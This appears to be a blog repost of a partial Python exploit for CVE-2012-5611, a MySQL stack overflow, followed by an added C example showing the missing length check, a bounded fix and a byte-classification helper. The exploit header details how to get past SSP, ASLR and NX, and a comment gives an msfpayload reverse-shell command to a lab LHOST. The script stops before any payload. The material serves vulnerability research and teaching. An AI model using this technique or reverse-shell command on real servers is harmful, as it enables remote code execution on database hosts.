MySQL Stack Buffer Overflow Linux x86 32bits

Test method:

The program (method) may be offensive; it is for security research and teaching only, use at your own risk!

#!/usr/bin/env python
# 27/12/12 - status : public release

# CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )
# -------- Author   : ipv
# -------- Impact   : high
# -------- URL      : http://blog.ring0.me/
# -------- Description
#
# The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.
# MySQL server is prone to a remote buffer overflow that
# allows a remote authenticated attacker to reach code execution in the
# context of the user running the MySQL instance (default: mysql user).

# The vulnerability resides in the acl_get function, called when an authenticated
# user requests a privileged Account Management statement. MySQL fails
# to verify the length of the user-controlled "db" parameter.
#
#     end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);
#
# The destination address of the strcpy is located on an mmap'ed page dedicated to
# the user connection, which allows a buffer overflow into adjacent memory.
#
# Different attack vectors may be possible depending on the system.
# FYI, Microsoft Windows versions are vulnerable as well.
#---------------------------------------------------------
# To bypass ASLR/SSP/RELRO/NX:
#------------------------------------------------------------------------------
# I take advantage of the threading model. This means MySQL uses only one address
# space for all MySQL resources (data structures, network management,
# sessions, etc.).
# To bypass SSP, I overwrite the sysinfo handler (pointing to the sysenter vdso) of
# the TCB structure located higher on the stack.
# The ROP chain aims to pivot to our controlled stack data. At this point,
# if we overwrite the sysinfo handler, we cannot use ret2libc and/or the GOT
# dereferencing technique since the libc API relies on the sysinfo pointer
# to call sysenter.
#
# So to accomplish code exec, afaik, you have two ways:
#    1 - Extract sysinfo from an intact TCB and use it as a proxy call
#    (or you can restore the first sysinfo after doing the modification on the GOT)
#        -> I use it for the redhat exploit (no SSP on redhat/centos);
#        -> this allows us to bypass relro/aslr/nx
#    2 - Find an int 0x80 / sysenter gadget in .text;
#    (A bad instruction follows the int 0x80 gadget, so you get a single shot at
#    code exec. So, I advise you to find a sysenter.)
#        - I use sysenter for ubuntu 10.04 self-compiled with SSP.
#        - this allows us to bypass relro/ssp/aslr/nx
#
# Shellcodes are alphanum-mixed (skylined's tool ftw). The exploit bypasses
# SSP/ASLR/NX.
#
#---------------------------------------------------------
# UTF-8 and ROP chain limitations:
#---------------------------------------------------------
# MySQL schema object names restrict a database name to alphanumeric
# characters (plus $ and _).
# To bypass it, I use UTF-8 encoding with bytes lower than 0x80. Encoding is
# done by MySQL when the database name is quoted with `` (mandatory to
# successfully exploit the target). Yes, the devil is in the details.

# MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html
#
# For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net

########################################################################
# Modules
#

import pymysql
import sys
import struct
import os, socket

########################################################################
# Authentication options
#

MYSQL_USER = "test"
MYSQL_PASSWORD = ""

#MYSQL_HOST = "192.168.130.147"
MYSQL_HOST = "192.168.130.129"
MYSQL_PORT = 3306

########################################################################
# Helper
#

def _x(v):
    # strings (raw payload bytes) pass through; ints are packed as a
    # little-endian dword so gadget addresses can be dropped into the chain
    if isinstance(v, str):
        return v
    return struct.pack("<I", v)

# The TCB layout is used when we face SSP: the overflow reaches the i386
# glibc thread control block that sits above the overflowed key[] buffer.
class _TCB:
    tcb = 0 # updated later by a ret gadget
    dtv = "BBBB"
    _self = "CCCC"
    multiple_threads = "DDDD"
    sysinfo = 0 # SEIP - updated later by stack pivot gadget
    stack_guard = "AAAA"
    pointer_guard = 0 # updated later by a pop pop ret gadget

# base class
class rc_base:
    eip_off = 0
    align_payload = 0
    align_stack = 2048
    retsled = ""
    safe_overwrite = ""
    pivot = ""
    pppr = ""
    ppr = ""

    # ./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp
    # XXX - CHANGEME !
    sc_rev_tcp = None  # XXX - CHANGEME: alpha2-encoded shellcode goes here; the script is cut off at this point
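The following C is an added example, not the exploit's own code and not MySQL's source. The first part models the `ip\0user\0db\0` key that the `strmov()` chain quoted in the header builds, keeps the unchecked shape beside a variant that refuses the copy when the key cannot fit, and so shows the missing length check on `db`. The second part covers the identifier limitation from the "UTF-8 and ROP chain limitations" section: it classifies a candidate database name (here, a packed ROP chain) as sendable unquoted, sendable only between backticks, or not sendable at all because it contains a NUL byte. `ACL_KEY_LENGTH`, the function names and the sample addresses are assumptions for illustration; treating every non-ASCII byte as "needs quoting" is a deliberate simplification (MySQL also permits extended characters unquoted, but a raw ROP chain is not valid UTF-8 in the first place).

```c
/* Added example, not the exploit's code nor MySQL's source.
 * Part 1: the acl_get() key layout and its missing length check.
 * Part 2: which payload bytes can travel as a database name. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ACL_KEY_LENGTH 64  /* assumed size of the fixed stack buffer key[] */

/* strmov(): copy src into dst and return a pointer to the terminating NUL.
 * Same contract as the MySQL helper; nothing bounds the copy. */
static char *strmov(char *dst, const char *src)
{
    while ((*dst++ = *src++) != '\0')
        ;
    return dst - 1;
}

/* Bytes the key needs: three fields plus their three NUL terminators. */
size_t acl_key_needed(const char *ip, const char *user, const char *db)
{
    return strlen(ip ? ip : "") + 1 + strlen(user) + 1 + strlen(db) + 1;
}

/* The vulnerable shape from the page: db is copied with no length check,
 * so a long db runs past key[] into whatever lies above it on the stack. */
char *acl_key_build_unchecked(char *key, const char *ip, const char *user, const char *db)
{
    char *tmp_db;
    char *end = strmov((tmp_db = strmov(strmov(key, ip ? ip : "") + 1, user) + 1), db);
    (void)tmp_db;
    return end;
}

/* Hardened variant: refuse before touching the buffer if the key cannot fit.
 * Returns the key length (bytes up to the final NUL) or -1 on overflow. */
long acl_key_build_checked(char *key, size_t cap, const char *ip, const char *user, const char *db)
{
    if (acl_key_needed(ip, user, db) > cap)
        return -1;
    return (long)(acl_key_build_unchecked(key, ip, user, db) - key);
}

/* Part 2: unquoted names are [0-9a-zA-Z$_], backticks lift that restriction,
 * and a NUL can never be sent (strmov() stops at it, U+0000 is not allowed). */
enum db_name_class { DB_UNQUOTED_OK = 0, DB_NEEDS_BACKTICKS = 1, DB_IMPOSSIBLE = 2 };

static int unquoted_byte_ok(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') ||
           (c >= 'A' && c <= 'Z') || c == '$' || c == '_';
}

int classify_db_name(const unsigned char *name, size_t len)
{
    int needs_quotes = 0;
    for (size_t i = 0; i < len; i++) {
        if (name[i] == 0)
            return DB_IMPOSSIBLE;
        if (!unquoted_byte_ok(name[i]))
            needs_quotes = 1;
    }
    return needs_quotes ? DB_NEEDS_BACKTICKS : DB_UNQUOTED_OK;
}

/* Pack a little-endian 32-bit ROP chain into out (4*n bytes) and return how
 * many dwords contain a NUL byte: each of those is an address the chain
 * cannot carry through the db name. */
size_t rop_chain_pack(const unsigned int *addrs, size_t n, unsigned char *out)
{
    size_t bad = 0;
    for (size_t i = 0; i < n; i++) {
        int has_nul = 0;
        for (int b = 0; b < 4; b++) {
            out[4 * i + b] = (unsigned char)(addrs[i] >> (8 * b));
            if (out[4 * i + b] == 0)
                has_nul = 1;
        }
        bad += (size_t)has_nul;
    }
    return bad;
}

int main(void)
{
    char key[ACL_KEY_LENGTH];
    char big[200];                       /* constructed 199-byte db name */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("short db -> %ld\n", acl_key_build_checked(key, sizeof key, "127.0.0.1", "test", "db"));
    printf("199-byte db -> %ld\n", acl_key_build_checked(key, sizeof key, "127.0.0.1", "test", big));

    unsigned int chain[] = { 0x08048abc, 0x41414141, 0x0804a100 };  /* constructed sample gadgets */
    unsigned char packed[sizeof chain];
    size_t bad = rop_chain_pack(chain, 3, packed);
    printf("dwords with a NUL byte: %zu, class: %d\n", bad, classify_db_name(packed, sizeof packed));
    return 0;
}
```

Run stand-alone, the checked builder accepts the short name and returns -1 for the 199-byte one, while the sample chain is rejected outright because `0x0804a100` carries a NUL byte; drop that dword and the remaining bytes (`0x04`, `0x08`) still need the backtick quoting the header calls mandatory.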
Original source: https://www.cnblogs.com/security4399/p/2837900.html